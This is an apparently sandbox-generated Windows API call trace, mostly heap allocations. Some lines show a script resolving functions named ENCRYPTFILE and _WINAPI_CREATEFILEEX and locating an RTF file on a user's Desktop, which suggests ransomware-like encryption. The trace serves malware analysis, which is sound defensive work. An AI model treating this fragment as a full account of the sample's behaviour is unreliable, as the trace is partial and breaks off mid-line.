[0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0119.582] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0119.582] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0119.582] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0119.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0119.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0119.583] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.583] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0119.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0119.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0119.583] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348b92b0, ftCreationTime.dwHighDateTime=0x1d5ef1d, ftLastAccessTime.dwLowDateTime=0x2fccd30, ftLastAccessTime.dwHighDateTime=0x1d5ef28, ftLastWriteTime.dwLowDateTime=0x2fccd30, ftLastWriteTime.dwHighDateTime=0x1d5ef28, nFileSizeHigh=0x0, nFileSizeLow=0x22f8, dwReserved0=0x0, dwReserved1=0x8, cFileName="5NSsZwi6b.rtf", cAlternateFileName="5NSSZW~1.RTF")) returned 0x41ac500 [0119.584] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0119.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0119.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0119.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0119.584] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0119.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0119.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0119.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0119.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0119.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0119.585] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0119.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0119.585] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0119.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0119.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0119.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0119.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0119.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0119.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0119.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0119.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0119.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0119.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0119.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0119.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0119.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0119.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0119.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0119.587] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0119.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0119.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0119.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0119.590] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0119.590] RtlAllocateHeap 